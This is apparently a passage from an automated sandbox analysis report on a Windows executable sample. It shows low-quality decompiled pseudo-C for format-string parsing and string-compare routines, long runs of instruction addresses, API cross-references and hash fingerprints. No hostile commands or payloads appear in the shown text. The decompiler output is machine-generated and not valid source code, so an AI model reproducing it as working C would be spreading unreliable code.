															_t631 =  *_t531;
															_t583 = _t531;
															_t531 =  &(_t531[1]);
															_t603 = _t631;
														} while (_t631 - 0x30 <= 9);
													}
													goto L33;
												}
												L20:
												_t482 =  &(_t482[2]);
												 *((short*)(_t482 - 2)) = 0;
												if(_t619 != _t482) {
													goto L20;
												} else {
													 *(_t667 - 0x70) = _t642;
													goto L24;
												}
											}
										}
									}
									goto L79;
								}
								asm("cdq");
								_t613 = (_t613 & 0x00000007) + _t545 - "aAeEfFgGcCdiouxXnpsS" >> 3;
								__eflags = _t613 - 0xffffffff;
								if(_t613 == 0xffffffff) {
									goto L80;
								}
								__eflags =  *(_t667 - 0x6c) - _t654;
								if( *(_t667 - 0x6c) < _t654) {
									 *(_t667 - 0x6c) = _t654;
								}
								goto L79;
							}
							 *(_t667 - 0x58) =  &(_t587[1]);
							_t548 = _t587[1];
							__eflags = _t548 - 0x2a;
							if(_t548 == 0x2a) {
								 *(_t667 - 0x58) =  &(_t587[2]);
								_t550 = L00427360(_t667 - 0x58);
								__eflags = _t550;
								if(_t550 == 0) {
									goto L225;
								}
								__eflags = _t654 - _t550;
								if(_t654 < _t550) {
									_t654 = _t550;
									 *(_t667 - 0x58) =  &(( *(_t667 - 0x58))[1]);
								} else {
									 *(_t667 - 0x58) =  &(( *(_t667 - 0x58))[1]);
								}
								goto L75;
							}
							_t593 =  &(_t587[2]);
							__eflags = _t548 - 0x30 - 9;
							if(_t548 - 0x30 > 9) {
								goto L75;
							}
							do {
								_t552 = _t593;
								 *(_t667 - 0x58) = _t593;
								_t593 =  &(_t593[1]);
								__eflags =  *_t552 - 0x30 - 9;
							} while ( *_t552 - 0x30 <= 9);
							goto L75;
						}
						_t555 =  &(_t587[1]);
						_t613 = _t609 - 0x30;
						__eflags = _t613 - 9;
						if(_t613 > 9) {
							goto L70;
						}
						do {
							 *(_t667 - 0x58) = _t555;
							_t638 =  *_t555;
							_t587 = _t555;
							_t555 =  &(_t555[1]);
							_t609 = _t638;
							_t613 = _t638 - 0x30;
							__eflags = _t613 - 9;
						} while (_t613 <= 9);
						goto L70;
					}
				}
			}

0x00428d00
0x00428d00
0x00428d00
0x00428d00
0x00428d03
0x00428d06
0x00428d0d
0x00428d11
0x00428d16
0x00428d18
0x00000000
0x00000000
0x00428d1a
0x00428d1d
0x00428d20
0x00428d23
0x0042940e
0x00429411
0x00429416
0x00429418
0x004295f5
0x004295f8
0x004295fd
0x00429604
0x00428e03
0x00428e03
0x00428e03
0x00428e06
0x00428e06
0x00428e06
0x00428e09
0x00428e0c
0x00428e0f
0x00428e11
0x00000000
0x00000000
0x00428e17
0x00428e1a
0x00428e93
0x00000000
0x00428e93
0x00428e1f
0x00428e21
0x00428e23
0x00428e28
0x00428e2d
0x00428e2f
0x00428e38
0x00428e38
0x00428e3b
0x00428e3b
0x00428e41
0x00428e48
0x00428e4f
0x00428e56
0x00428e5d
0x00428e60
0x00428e66
0x00428e69
0x00428f5c
0x00428f5c
0x00000000
0x00428e6f
0x00428e6f
0x00428e6f
0x00428e72
0x00428e75
0x00428e7a
0x00428e7d
0x00428e7f
0x004293ab
0x004293ab
0x004293ae
0x004293b1
0x00428f78
0x00428f78
0x00428f7b
0x00428f83
0x00428f88
0x00000000
0x00428f88
0x004293b7
0x004293ba
0x004293bd
0x00000000
0x00000000
0x004293c3
0x004293c5
0x004294c5
0x004294c5
0x004294c9
0x004294cf
0x004294cf
0x004293d2
0x004293d2
0x004293d5
0x004293d7
0x00428f51
0x00428f51
0x00000000
0x00428f51
0x004293dd
0x004293df
0x004293e2
0x004293e4
0x004293e6
0x004293eb
0x004293eb
0x004293eb
0x004293f2
0x004293f4
0x00000000
0x004293f4
0x004293cb
0x00000000
0x004293cb
0x00428e85
0x00428e88
0x00000000
0x0042913e
0x00429141
0x00429143
0x00000000
0x00000000
0x00429149
0x0042914d
0x00000000
0x00000000
0x00000000
0x00000000
0x00429010
0x00429013
0x00429015
0x00000000
0x00000000
0x0042901b
0x00429022
0x00000000
0x00000000
0x00000000
0x00000000
0x004291e0
0x004291e3
0x004291e5
0x00000000
0x00000000
0x004291eb
0x004291ef
0x00000000
0x00000000
0x0042919e
0x004291a1
0x004291a3
0x00000000
0x00000000
0x004291a5
0x004291a9
0x004295a9
0x00000000
0x004295a9
0x004291af
0x004291b2
0x004291b4
0x0042963a
0x0042963a
0x0042963d
0x00429640
0x00429640
0x00429640
0x00429644
0x00429646
0x00429648
0x00429648
0x0042964a
0x00429651
0x00000000
0x00000000
0x00429657
0x0042965a
0x0042965c
0x004297d2
0x004297d9
0x00429662
0x00429662
0x00429669
0x0042966c
0x0042966e
0x0042966e
0x00000000
0x0042965c
0x004291ba
0x004291bd
0x004291c2
0x004291c4
0x00429637
0x00000000
0x00429637
0x004291ca
0x004291cd
0x004291d0
0x004291d4
0x004291d7
0x004291d9
0x00000000
0x00000000
0x00429185
0x00429188
0x0042918a
0x00000000
0x00000000
0x00429190
0x00429197
0x00000000
0x00000000
0x0042916c
0x0042916f
0x00429171
0x00000000
0x00000000
0x00429177
0x0042917e
0x00000000
0x00000000
0x00429154
0x00429158
0x00429676
0x00429679
0x00429680
0x00429687
0x00429689
0x00000000
0x00429689
0x00000000
0x00000000
0x00428f63
0x00428f66
0x00428f68
0x0042959b
0x004295a2
0x00000000
0x004295a2
0x00428f6e
0x00428f72
0x00000000
0x00000000
0x00000000
0x00000000
0x00429270
0x00429273
0x00429275
0x00429278
0x00000000
0x00000000
0x00000000
0x00000000
0x00429244
0x00000000
0x00000000
0x0042921d
0x00429220
0x00429222
0x00429225
0x00000000
0x00000000
0x00000000
0x00000000
0x004291f6
0x004291f9
0x004291fb
0x004291fe
0x00000000
0x00000000
0x00000000
0x00000000
0x00429293
0x00429296
0x00429298
0x0042929b
0x00000000
0x00000000
0x00000000
0x00000000
0x00428f0f
0x00428f12
0x00428f15
0x00428f1a
0x00428f1d
0x00428f20
0x00428f23
0x0042915e
0x0042915e
0x00429165
0x00000000
0x00429165
0x00428f29
0x00428f30
0x00000000
0x00000000
0x00428f36
0x00428f39
0x00000000
0x00000000
0x00428f3f
0x00000000
0x00000000
0x00428f46
0x00428f46
0x00428f46
0x00428f46
0x00428f4a
0x00000000
0x00000000
0x00429502
0x00429502
0x00429505
0x00429509
0x0042950b
0x0042950d
0x004297aa
0x004297aa
0x00429516
0x0042951b
0x0042951e
0x00429520
0x00429522
0x00429527
0x00000000
0x00000000
0x004292e3
0x004292e7
0x004292ea
0x00429760
0x00429763
0x00429765
0x00429769
0x0042976c
0x004292f0
0x004292f0
0x004292f4
0x004295c0
0x004295c4
0x004295c6
0x004295cd
0x004292fa
0x004292fa
0x004292fe
0x00429302
0x00429304
0x0042930b
0x0042930e
0x004296fa
0x004296fe
0x00429705
0x00429314
0x00429314
0x00429318
0x00429797
0x0042979b
0x004297a2
0x004297a2
0x00429318
0x0042930e
0x004292f4
0x0042931e
0x00429321
0x00000000
0x00429327
0x00429327
0x0042932a
0x0042932d
0x00429330
0x00429333
0x00429335
0x0042933a
0x00000000
0x0042933a
0x00000000
0x004292bd
0x004292c0
0x004292c2
0x004292c5
0x004292c8
0x0042927a
0x0042927a
0x0042927c
0x00429280
0x00429283
0x00429286
0x0042928b
0x00000000
0x0042928b
0x004292ca
0x004292ca
0x004292cc
0x004292d0
0x004292d3
0x004292d6
0x004292db
0x00000000
0x00000000
0x00429342
0x00429345
0x0042934c
0x0042934f
0x00429352
0x0042924b
0x0042924b
0x0042924e
0x00429251
0x00429256
0x0042925a
0x0042925c
0x00429260
0x00429263
0x00429268
0x00000000
0x00429268
0x00429358
0x0042935b
0x0042935e
0x00429363
0x00429367
0x00429369
0x0042936c
0x0042936f
0x00429374
0x00000000
0x00000000
0x004290e7
0x004290ee
0x004290f2
0x004290f5
0x0042974c
0x0042974f
0x00429751
0x00429755
0x00429758
0x004290fb
0x004290fb
0x004290ff
0x004295d5
0x004295d9
0x004295db
0x004295e1
0x00429105
0x00429105
0x00429109
0x0042910b
0x0042910e
0x00429111
0x00429115
0x00429118
0x004296e8
0x004296ec
0x004296f2
0x0042911e
0x0042911e
0x00429122
0x00429785
0x00429789
0x0042978f
0x0042978f
0x00429122
0x00429118
0x004290ff
0x00429128
0x00429128
0x0042912b
0x0042912e
0x00429131
0x00429136
0x00000000
0x00000000
0x004290bd
0x004290c0
0x004290c2
0x004290c5
0x004290c8
0x0042922b
0x0042922b
0x0042922d
0x00429231
0x00429234
0x00429237
0x0042923c
0x00000000
0x0042923c
0x004290ce
0x004290ce
0x004290d0
0x004290d4
0x004290d7
0x004290da
0x004290df
0x00000000
0x00000000
0x00429090
0x00429093
0x00429095
0x00429098
0x0042909b
0x00429204
0x00429204
0x00429206
0x0042920a
0x0042920d
0x00429210
0x00429215
0x00000000
0x00429215
0x004290a1
0x004290a1
0x004290a3
0x004290a7
0x004290aa
0x004290ad
0x004290b2
0x00000000
0x00000000
0x00429063
0x00429066
0x00429068
0x0042906b
0x0042906e
0x004292a1
0x004292a1
0x004292a3
0x004292a7
0x004292aa
0x004292ad
0x004292b2
0x00000000
0x004292b2
0x00429074
0x00429074
0x00429076
0x0042907a
0x0042907d
0x00429080
0x00429085
0x00000000
0x00000000
0x00429029
0x0042902d
0x00429030
0x00429739
0x0042973c
0x0042973e
0x00429742
0x00429744
0x00000000
0x00429744
0x00429036
0x0042903a
0x00429774
0x00429776
0x00429779
0x0042977d
0x00000000
0x0042977d
0x00429040
0x00429044
0x00429050
0x00429050
0x00429054
0x00429057
0x00429059
0x00000000
0x00429059
0x00429046
0x0042904a
0x004296d2
0x004296d6
0x004296d9
0x004296db
0x004296dd
0x004296e0
0x00000000
0x004296e0
0x00000000
0x00000000
0x00428fcc
0x00428fcf
0x00428fd1
0x00428fd3
0x00428fd6
0x00428fd9
0x0042970d
0x00429710
0x00429717
0x00429717
0x00428fd9
0x00428fdf
0x00428fe2
0x00428fe6
0x00428fe8
0x00428fef
0x00428ff2
0x00428ff5
0x00428ff8
0x00428ffb
0x00428ffe
0x00429003
0x00429008
0x00000000
0x00000000
0x00428f93
0x00428f96
0x00428f99
0x00000000
0x00000000
0x00428f9f
0x00428fa2
0x00428fa6
0x00428fa8
0x00428faa
0x004296c3
0x004296c8
0x00428fb0
0x00428fb8
0x00428fba
0x00428fba
0x00428fbc
0x00428fbf
0x00428fc4
0x00000000
0x00000000
0x00428f53
0x00428f53
0x00428f53
0x00000000
0x00428e6f
0x00428e69
0x00428ea3
0x00428ea5
0x00428eba
0x00428ebd
0x00428ec0
0x00428ecf
0x00428ecf
0x00428eb0
0x00428eb0
0x00428eb3
0x00428eb6
0x00428eb6
0x00000000
0x00428eb0
0x00428e03
0x0042941e
0x00429420
0x00429422
0x00429422
0x00429424
0x00429427
0x0042942a
0x0042942d
0x00428d55
0x00428d55
0x00428d58
0x00428d93
0x00428d96
0x00428d9e
0x00428da1
0x00428da4
0x00428da8
0x00428daf
0x00428db4
0x00428db6
0x00428dba
0x00428de0
0x00428de0
0x00428de3
0x00428a19
0x00428a19
0x00428a1b
0x00428a1e
0x00428a24
0x00428941
0x00428944
0x00428930
0x00428932
0x00428935
0x00428935
0x0042893b
0x00000000
0x00000000
0x00000000
0x0042893b
0x00428946
0x00428949
0x0042894c
0x00428952
0x00428959
0x0042895b
0x00428cf3
0x00428cf6
0x00000000
0x00428cf6
0x00428961
0x00428964
0x0042896a
0x00000000
0x00428970
0x00428970
0x00428973
0x00428986
0x00428988
0x0042898f
0x00428992
0x0042899d
0x00428980
0x00428980
0x00428983
0x00000000
0x00428983
0x0042899f
0x004289a1
0x004289a7
0x00428f03
0x00428f07
0x004289c5
0x004289c8
0x00428ed0
0x00428ed4
0x00428ed6
0x00429436
0x00000000
0x00429436
0x00428edf
0x00428ee2
0x00428ee5
0x00000000
0x00000000
0x00428ef0
0x00428ef0
0x00428ef9
0x00428ef9
0x00428efe
0x004289ce
0x004289d1
0x004289d4
0x004289d9
0x004289dc
0x004289df
0x004289eb
0x004289ef
0x004289f6
0x00428a0f
0x00428a13
0x00428dd7
0x00428dd7
0x00000000
0x00428dd7
0x00000000
0x00428a13
0x004289fd
0x00428a03
0x00428a09
0x00000000
0x00000000
0x00000000
0x00428a09
0x004289ad
0x004289ad
0x004289b3
0x00000000
0x00000000
0x00000000
0x00000000
0x004289b5
0x004289b5
0x004289b5
0x004289b8
0x004289bb
0x004289c0
0x00000000
0x004289b5
0x00428a30
0x00428a30
0x00428a30
0x00428a40
0x00428a45
0x00428a4a
0x00428a4e
0x00428a52
0x00428a55
0x00428a58
0x00000000
0x00428a5e
0x00428a5e
0x00428a61
0x00428a70
0x00428a75
0x00428a78
0x00428a7a
0x00428a7e
0x00428a81
0x00428a83
0x00428a83
0x00000000
0x00428ab1
0x00428ab4
0x00428aa0
0x00428aa2
0x00428aa2
0x00000000
0x00000000
0x00000000
0x00428aa5
0x00428aa5
0x00428aa8
0x00428aab
0x00428c40
0x00428c40
0x00428c43
0x00428c46
0x00428c50
0x00428c5b
0x00428c60
0x00000000
0x00000000
0x00428c62
0x00428c67
0x00428df7
0x00428df7
0x00428dfa
0x00428e00
0x00428e00
0x00000000
0x00428e00
0x00428c6d
0x00428c70
0x00428c73
0x00428c76
0x00428caf
0x00428caf
0x00428cb3
0x00428cb8
0x00428c80
0x00428c83
0x00429400
0x00429400
0x00000000
0x00429400
0x00428c89
0x00428c8c
0x00428c8f
0x00000000
0x00000000
0x00428c95
0x00428c98
0x00000000
0x00000000
0x00428c9e
0x00428c9e
0x00428c9e
0x00000000
0x00428c9e
0x00428cba
0x00428cc0
0x00428cd0
0x00000000
0x00000000
0x00000000
0x00428ca1
0x00428ca1
0x00428ca4
0x00428ca7
0x00000000
0x00428caf
0x00428df0
0x00000000
0x00428df0
0x00000000
0x00428ab6
0x00428ab6
0x00428ab9
0x00428abf
0x00428ac5
0x00428acc
0x00428acf
0x0042943e
0x00429441
0x00429453
0x00429453
0x00429456
0x0042945f
0x00429462
0x00429466
0x0042946b
0x0042946d
0x00000000
0x00000000
0x00429450
0x00429450
0x00429450
0x0042946f
0x00429471
0x00429473
0x00429476
0x00429479
0x004295e9
0x004295ed
0x004294a0
0x004294a0
0x004294a3
0x00429691
0x00429695
0x00429697
0x00429731
0x00000000
0x00429731
0x004296a0
0x004296a3
0x004296a6
0x00000000
0x00000000
0x004296b0
0x004296b0
0x004296b9
0x004296b9
0x004296be
0x004294a9
0x004294ac
0x004294af
0x004294b4
0x004294b7
0x004294ba
0x00000000
0x00000000
0x00000000
0x004294c0
0x00429482
0x00429485
0x00000000
0x00000000
0x00429490
0x00429490
0x00429493
0x00429496
0x0042949b
0x0042949b
0x00000000
0x00428ad5
0x00428ad8
0x00428adf
0x00428ae6
0x00428ae9
0x00428af3
0x00428af6
0x00428afd
0x00428b08
0x00428af0
0x00428af0
0x00000000
0x00428af0
0x00428b0a
0x00428b0d
0x00428b13
0x00429612
0x00429615
0x0042961a
0x0042961c
0x0042961f
0x0042971f
0x00429722
0x00429725
0x00429728
0x00429625
0x00429625
0x00429628
0x0042962f
0x0042962f
0x00428b45
0x00428b48
0x00429532
0x00429535
0x00429539
0x0042953b
0x004297ba
0x004297bd
0x004297c2
0x004297c4
0x004297c7
0x004297e3
0x004297e8
0x004297eb
0x00429395
0x00429395
0x00429398
0x00428c2a
0x00428c2a
0x00428c2d
0x00428c33
0x00000000
0x00000000
0x00000000
0x00428c33
0x0042939e
0x0042939e
0x004293a0
0x00000000
0x004293a0
0x004297c9
0x00000000
0x004297c9
0x00429544
0x00429547
0x0042954a
0x00000000
0x00000000
0x00000000
0x00000000
0x00429550
0x00429550
0x00429550
0x00429552
0x00429555
0x0042955e
0x0042955e
0x00429566
0x0042956b
0x0042956e
0x00429570
0x00428b61
0x00428b64
0x0042937c
0x00429381
0x00429384
0x0042938a
0x0042938c
0x00428b7e
0x00428b7e
0x00428b81
0x00428b87
0x00428b8b
0x00428b92
0x00428b99
0x00428ba0
0x00000000
0x00000000
0x00428bb8
0x00428bbd
0x00000000
0x00000000
0x00428bc3
0x00428bc9
0x00428bd1
0x00428bd3
0x00428bde
0x00428be7
0x00428bef
0x0042957d
0x00429580
0x0042958b
0x0042958e
0x00429590
0x00428bfe
0x00428bfe
0x00428c01
0x00428c04
0x00428c04
0x00428c06
0x00428c0b
0x00428c0d
0x00428c12
0x00428c19
0x00428c20
0x00428c20
0x00428c19
0x00428c23
0x00428c26
0x00000000
0x00428c04
0x00429596
0x00428bf7
0x00428bfb
0x00000000
0x00428bfb
0x00429392
0x00429392
0x00000000
0x00429392
0x00428b6d
0x00428b73
0x00428b78
0x00000000
0x00000000
0x00000000
0x00428b78
0x00000000
0x00429576
0x00428b4e
0x00428b51
0x00428b59
0x00428b5b
0x00000000
0x00000000
0x00000000
0x00428b5b
0x00428b1c
0x00428b25
0x00428b30
0x00428b30
0x00428b33
0x00428b36
0x00428b38
0x00428b3b
0x00428b40
0x00428b30
0x00000000
0x00428b25
0x00428a85
0x00428a87
0x00428a8a
0x00428a90
0x00000000
0x00428a92
0x00428a92
0x00000000
0x00428a92
0x00428a90
0x00428a58
0x00428a24
0x00000000
0x00428de9
0x00428dc1
0x00428dc7
0x00428dca
0x00428dcd
0x00000000
0x00000000
0x00428dcf
0x00428dd2
0x00428dd4
0x00428dd4
0x00000000
0x00428dd2
0x00428d5d
0x00428d60
0x00428d64
0x00428d66
0x004294e1
0x004294e4
0x004294e9
0x004294eb
0x00000000
0x00000000
0x004294f1
0x004294f3
0x004295b5
0x004295b7
0x004294f9
0x004294f9
0x004294f9
0x00000000
0x004294f3
0x00428d6f
0x00428d72
0x00428d75
0x00000000
0x00000000
0x00428d80
0x00428d80
0x00428d82
0x00428d85
0x00428d8e
0x00428d8e
0x00000000
0x00428d80
0x00428d2c
0x00428d2f
0x00428d32
0x00428d35
0x00000000
0x00000000
0x00428d40
0x00428d40
0x00428d43
0x00428d46
0x00428d48
0x00428d4b
0x00428d4d
0x00428d50
0x00428d50
0x00000000
0x00428d40
0x00428d03

APIs

strchr.MSVCRT ref: 00428996
strchr.MSVCRT ref: 00428D11
strchr.MSVCRT ref: 00428DAF

Strings

aAeEfFgGcCdiouxXnpsS, xrefs: 004289DF, 004289F8, 00428B8B, 00428BA6, 00428DA8, 00428DBC
+-' 0#, xrefs: 00428988, 00428AF6, 00428D06

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strchr
String ID: +-' 0#$aAeEfFgGcCdiouxXnpsS
API String ID: 2830005266-3207406329
Opcode ID: 81e18b5e55f3802b6ceb59eb729484c1748ee9f44cd50fb90f2c4a5bfd3804c2
Instruction ID: 04ad55a80a6fd5703aa8b1f9cd70c2a0ae7a194343eb0195bee1e8cf101a4908
Opcode Fuzzy Hash: 81e18b5e55f3802b6ceb59eb729484c1748ee9f44cd50fb90f2c4a5bfd3804c2
Instruction Fuzzy Hash: 87C1A071E056A98FCB20CF65D4803AEBBF2AF55300F98815FC851AB349EB789945CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00430AD0 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 268
stringCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00430AD0(void* __ebx, int** __ecx, void* __edi, void* __esi) {
				int _t52;
				char* _t54;
				char* _t56;
				char* _t58;
				int _t62;
				int _t63;
				int _t64;
				int _t66;
				int _t67;
				int _t69;
				int _t71;
				char* _t74;
				char* _t76;
				char* _t77;
				char* _t78;
				char* _t79;
				char* _t80;
				char* _t83;
				char* _t86;
				int _t89;
				int** _t92;
				int* _t93;
				char* _t95;
				char* _t97;
				int* _t99;
				int* _t100;
				char* _t101;
				int _t104;
				char* _t107;
				char* _t108;
				char* _t111;
				char* _t120;
				char* _t121;
				char* _t123;
				char* _t124;
				char* _t127;
				int _t132;
				int* _t136;
				char* _t137;
				char* _t138;
				void* _t143;
				char** _t144;
				char** _t145;
				char** _t146;
				char** _t147;

				_t92 = __ecx;
				_push(__edi);
				_t144 = _t143 - 0x1c;
				_t136 =  *__ecx;
				_t107 = _t144[0xc];
				_t52 = _t144[0xd];
				_t76 =  *(_t136 - 0xc);
				if(_t107 > _t76) {
					_t144[3] = _t76;
					_t144[2] = _t107;
					_t144[1] = "basic_string::compare";
					 *_t144 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
					E004A5D70(_t107, __eflags);
					_push(_t107);
					_push(_t76);
					_t145 = _t144 - 0x10;
					_t99 =  *_t92;
					_t54 = _t145[8];
					_t108 = _t145[9];
					_t120 = _t145[0xb];
					_t77 =  *(_t99 - 0xc);
					__eflags = _t54 - _t77;
					if(__eflags > 0) {
						_t145[3] = _t77;
						_t145[2] = _t54;
						_t145[1] = "basic_string::compare";
						 *_t145 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
						E004A5D70(_t108, __eflags);
						0;
						_push(_t108);
						_push(_t120);
						_push(_t77);
						_t146 = _t145 - 0x10;
						_t100 =  *_t92;
						_t56 = _t146[8];
						_t121 = _t146[9];
						_t78 =  *(_t100 - 0xc);
						__eflags = _t56 - _t78;
						if(__eflags > 0) {
							_t146[3] = _t78;
							_t146[2] = _t56;
							_t146[1] = "basic_string::compare";
							 *_t146 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
							E004A5D70(_t108, __eflags);
							_push(_t136);
							_push(_t108);
							_push(_t121);
							_push(_t78);
							_t147 = _t146 - 0x1c;
							_t93 =  *_t92;
							_t58 = _t147[0xc];
							_t137 = _t147[0xd];
							_t101 = _t147[0xf];
							_t79 =  *(_t93 - 0xc);
							__eflags = _t58 - _t79;
							if(__eflags > 0) {
								L48:
								_t147[3] = _t79;
								_t147[2] = _t58;
								_t147[1] = "basic_string::compare";
								 *_t147 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
								E004A5D70(_t108, __eflags);
								0;
								0;
								_t104 =  *(_t147[1]) +  *((intOrPtr*)( *(_t147[1]) - 0xc));
								__eflags = _t104;
								 *_t93 = _t104;
								return _t93;
							} else {
								_t108 =  *(_t147[0xe]);
								_t123 =  *(_t108 - 0xc);
								__eflags = _t101 - _t123;
								if(__eflags > 0) {
									_t147[3] = _t123;
									_t147[2] = _t101;
									_t147[1] = "basic_string::compare";
									 *_t147 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
									_t58 = E004A5D70(_t108, __eflags);
									goto L48;
								} else {
									_t80 = _t79 - _t58;
									__eflags = _t80 - _t137;
									if(_t80 > _t137) {
										_t124 = _t123 - _t101;
										__eflags = _t124 - _t147[0x10];
										_t80 = _t137;
										if(_t124 <= _t147[0x10]) {
											goto L36;
										} else {
											goto L43;
										}
									} else {
										_t124 = _t123 - _t101;
										__eflags = _t124 - _t147[0x10];
										if(_t124 > _t147[0x10]) {
											L43:
											_t124 = _t147[0x10];
											_t138 = _t80;
											__eflags = _t80 - _t124;
											if(_t80 <= _t124) {
												goto L37;
											} else {
												goto L41;
											}
										} else {
											L36:
											__eflags = _t80 - _t124;
											_t138 = _t80;
											if(_t80 > _t124) {
												L41:
												_t138 = _t124;
												__eflags = _t138;
												if(_t138 == 0) {
													goto L38;
												} else {
													goto L39;
												}
											} else {
												L37:
												__eflags = _t138;
												if(_t138 != 0) {
													L39:
													_t63 =  &(_t58[_t93]);
													_t147[2] = _t138;
													_t147[1] =  &(_t101[_t108]);
													 *_t147 = _t63;
													L0042B1E0();
													__eflags = _t63;
													if(_t63 == 0) {
														goto L38;
													} else {
														return _t63;
													}
												} else {
													L38:
													_t62 = _t80 - _t124;
													__eflags = _t62;
													return _t62;
												}
											}
										}
									}
								}
							}
						} else {
							_t83 = _t78 - _t56;
							__eflags = _t83 - _t121;
							if(_t83 > _t121) {
								_t83 = _t121;
								_t111 =  *(_t146[0xa]);
								_t127 =  *(_t111 - 0xc);
								__eflags = _t127 - _t83;
								_t95 = _t127;
								if(_t127 <= _t83) {
									goto L24;
								} else {
									goto L28;
								}
							} else {
								_t111 =  *(_t146[0xa]);
								_t127 =  *(_t111 - 0xc);
								__eflags = _t127 - _t83;
								_t95 = _t127;
								if(_t127 > _t83) {
									L28:
									_t95 = _t83;
									__eflags = _t95;
									if(_t95 == 0) {
										goto L25;
									} else {
										goto L26;
									}
								} else {
									L24:
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										_t64 =  &(_t56[_t100]);
										_t146[2] = _t95;
										_t146[1] = _t111;
										 *_t146 = _t64;
										L0042B1E0();
										__eflags = _t64;
										if(_t64 == 0) {
											goto L25;
										} else {
											return _t64;
										}
									} else {
										L25:
										_t66 = _t83 - _t127;
										__eflags = _t66;
										return _t66;
									}
								}
							}
						}
					} else {
						_t86 = _t77 - _t54;
						__eflags = _t86 - _t108;
						if(_t86 > _t108) {
							_t86 = _t108;
							_t97 = _t120;
							__eflags = _t120 - _t86;
							if(_t120 <= _t86) {
								goto L13;
							} else {
								goto L17;
							}
						} else {
							__eflags = _t120 - _t86;
							_t97 = _t120;
							if(_t120 > _t86) {
								L17:
								_t97 = _t86;
								__eflags = _t97;
								if(_t97 == 0) {
									goto L14;
								} else {
									goto L15;
								}
							} else {
								L13:
								__eflags = _t97;
								if(_t97 != 0) {
									L15:
									_t145[2] = _t97;
									_t67 =  &(_t54[_t99]);
									 *_t145 = _t67;
									_t145[1] = _t145[0xa];
									L0042B1E0();
									__eflags = _t67;
									if(_t67 == 0) {
										goto L14;
									} else {
										return _t67;
									}
								} else {
									L14:
									_t69 = _t86 - _t120;
									__eflags = _t69;
									return _t69;
								}
							}
						}
					}
				} else {
					_t89 = _t76 - _t107;
					if(_t89 > _t52) {
						_t89 = _t52;
					}
					 *_t144 = _t144[0xe];
					_t71 = strlen(??);
					_t132 = _t71;
					if(_t71 > _t89) {
						_t71 = _t89;
						__eflags = _t71;
						if(_t71 == 0) {
							goto L4;
						} else {
							goto L5;
						}
					} else {
						if(_t71 != 0) {
							L5:
							_t144[2] = _t71;
							_t74 = _t144[0xe];
							 *_t144 =  &(_t107[_t136]);
							_t144[1] = _t74;
							L0042B1E0();
							__eflags = _t74;
							if(_t74 == 0) {
								goto L4;
							} else {
								return _t74;
							}
						} else {
							L4:
							return _t89 - _t132;
						}
					}
				}
			}

0x00430ad0
0x00430ad1
0x00430ad4
0x00430ad7
0x00430ad9
0x00430add
0x00430ae1
0x00430ae6
0x00430b54
0x00430b58
0x00430b5c
0x00430b64
0x00430b6b
0x00430b70
0x00430b72
0x00430b73
0x00430b76
0x00430b78
0x00430b7c
0x00430b80
0x00430b84
0x00430b87
0x00430b89
0x00430bea
0x00430bee
0x00430bf2
0x00430bfa
0x00430c01
0x00430c0c
0x00430c10
0x00430c11
0x00430c12
0x00430c13
0x00430c16
0x00430c18
0x00430c1c
0x00430c20
0x00430c23
0x00430c25
0x00430c93
0x00430c97
0x00430c9b
0x00430ca3
0x00430caa
0x00430cb0
0x00430cb1
0x00430cb2
0x00430cb3
0x00430cb4
0x00430cb7
0x00430cb9
0x00430cbd
0x00430cc1
0x00430cc5
0x00430cc8
0x00430cca
0x00430d68
0x00430d68
0x00430d6c
0x00430d70
0x00430d78
0x00430d7f
0x00430d8a
0x00430d8e
0x00430d98
0x00430d98
0x00430d9b
0x00430d9d
0x00430cd0
0x00430cd4
0x00430cd6
0x00430cd9
0x00430cdb
0x00430d4c
0x00430d50
0x00430d54
0x00430d5c
0x00430d63
0x00000000
0x00430cdd
0x00430cdd
0x00430cdf
0x00430ce1
0x00430d40
0x00430d42
0x00430d46
0x00430d48
0x00000000
0x00430d4a
0x00000000
0x00430d4a
0x00430ce3
0x00430ce3
0x00430ce5
0x00430ce9
0x00430d30
0x00430d30
0x00430d34
0x00430d36
0x00430d38
0x00000000
0x00430d3a
0x00000000
0x00430d3a
0x00430ceb
0x00430ceb
0x00430ceb
0x00430ced
0x00430cef
0x00430d25
0x00430d25
0x00430d27
0x00430d29
0x00000000
0x00430d2b
0x00000000
0x00430d2b
0x00430cf1
0x00430cf1
0x00430cf1
0x00430cf3
0x00430d03
0x00430d05
0x00430d07
0x00430d0b
0x00430d0f
0x00430d12
0x00430d17
0x00430d19
0x00000000
0x00430d1b
0x00430d22
0x00430d22
0x00430cf5
0x00430cf5
0x00430cfa
0x00430cfa
0x00430d00
0x00430d00
0x00430cf3
0x00430cef
0x00430ce9
0x00430ce1
0x00430cdb
0x00430c27
0x00430c27
0x00430c29
0x00430c2b
0x00430c84
0x00430c86
0x00430c88
0x00430c8b
0x00430c8d
0x00430c8f
0x00000000
0x00430c91
0x00000000
0x00430c91
0x00430c2d
0x00430c31
0x00430c33
0x00430c36
0x00430c38
0x00430c3a
0x00430c70
0x00430c70
0x00430c72
0x00430c74
0x00000000
0x00430c76
0x00000000
0x00430c76
0x00430c3c
0x00430c3c
0x00430c3c
0x00430c3e
0x00430c50
0x00430c50
